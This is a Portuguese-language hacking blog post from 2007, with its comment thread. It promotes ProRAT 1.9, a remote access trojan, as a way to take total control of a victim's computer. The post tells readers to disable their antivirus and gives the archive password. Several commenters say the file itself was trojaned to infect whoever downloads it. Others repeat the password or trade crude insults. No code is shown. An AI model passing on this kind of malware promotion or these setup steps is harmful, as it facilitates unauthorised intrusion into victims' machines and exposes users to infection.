Aprenda, Assista e Baixe tudo para Você se tornar um hacker!

domingo, 12 de agosto de 2007

prorat 1.9








eae galera mais uma novidade pra Vcs...

prorat 1.9 é um programa que te possibilita ter controle total ha maquina da sua vitima...
mais infelismente tem uma pequena desvantagem.....
quado for baixar ele e usar vc tem que desativar seu anti-virus pois por que ele é um proprio cavalo de troia, mas não se assuste isso não interfere em nada no funcionamento de sua maquina.....

download:

download

lembrando que para o acesso é presiso digitar a senha do arquivo zip que é {pro} sem os conchetes {}.
feito isso é só desativar o seu anti-virus e usar ele

video aula do prorat 1.9



esse video é muito bom garanto que vcs vão aprender com esse "professor..." ...kkkkkkkk....
muito comedia esse professor...kkkkkk......

abraço a todos e cuidado com que vc Faz, conhecimento não é crime...

fui...


18 comentários:

Anônimo disse...

aí grande.
o programa sei q eh interessante mas, esta pedindo senha...kual eh a propria?

walllace960@hotmail.com

kualker koisa me mande um email!

Teo_Rosa disse...

toma nu cú, pq não coloca certo, ti fodee .
aa loko so acaba com oc do cara ..
não viaje hameee!

Anônimo disse...

oi então eu baixei o programa do pro rat mais ta precisando de uma senha

vc pode me passa ela

hora que vc ve isso manda ela no meu msn
t-h-e-ustryp@hotmail.com

Anônimo disse...

a senha é (pro) sem os parentes ()

Anônimo disse...

bem interesante esse programa, a nao ser pelo fato de que vc colocou o programa para donwload e ja aproveitou prara utilizalo, fazendo com que o servidor se instale na hora que a pessoa executa o arquivo baixado (mas não comigo), pessoal se quizerem baixar o programa peguem direto do site do prorat, pois esse que ele postou nao e seguro...
so nao entendi uma coisa, qual o motivo daquele arquivo de configuração do Openkore, se aquele for seu loguim e senha do PBro vc ta ferrado.
(so mais esperto que vc possa imaginar)

Anônimo disse...

Po velho o programa eu sei que show de bola pq eu tive o 1.8 + sem a senha pra descompactar ta foda ne!! Posta ai velhao...

Anônimo disse...

Véi,vcs nao sabem ler nao???
ta escrito,para o acesso do programa tem que usar a senha {pro}sem colchetes!!!

Anônimo disse...

QUER DAR um de super inteligente e nem sabe planejar a configuraçao pra niguem a equipe top elite team ta de olho em vc.

de disse...

para mano deixa de ce troxa nunca vol cai nessa troxa mesmo

Anônimo disse...

Qe troxa.. N sabe nem usar o trojan!
Mano um trojan é inofencivo contra os qe não sao a vitima que vc Colocou o IP para a invasão..
Troxa mesmo né.. O server ja se auto abria.. Alem de Lammer Sabe nem usar um Avkill E um binder!
Mano se interna blz?
Troxa de +.. Ainda deixo o ip kkkkkkkkk
O ip fica na porta 666 do DOS de quem executar.. Tens sorte qe ngm conceguil baixar

Unknown disse...
Este comentário foi removido pelo autor.
Unknown disse...

aew eh o luis,pai eu vim aki no blog tah bombando,pai!!!!!!!!

Anônimo disse...

A SENHA E PRO

Anônimo disse...

A SENHA E PRO

Anônimo disse...

Manin tu tiro minha maior duvida q era a senha^^.
Vlw mas num me Hackeia suahsuahsuhasu.VLW^^ :{}

Anônimo disse...

SEus bandos de cavalos a senha é: pro (essas 3 letrinhas casuais ---> pro )

Anônimo disse...

Eis seus bandos de cu's vcs num tao vendo o lamer do blog ak dizer k a senha é pro naum? Se comesso assim ta fudidu pq naum vai sabr manipular o trj ai fod o proprio pc

Anônimo disse...

Na mó moral o lamer do blog ae é doidao . Disponibilizou o prorat com um spywere so pra fuder kem baixar o prog . Carin sperto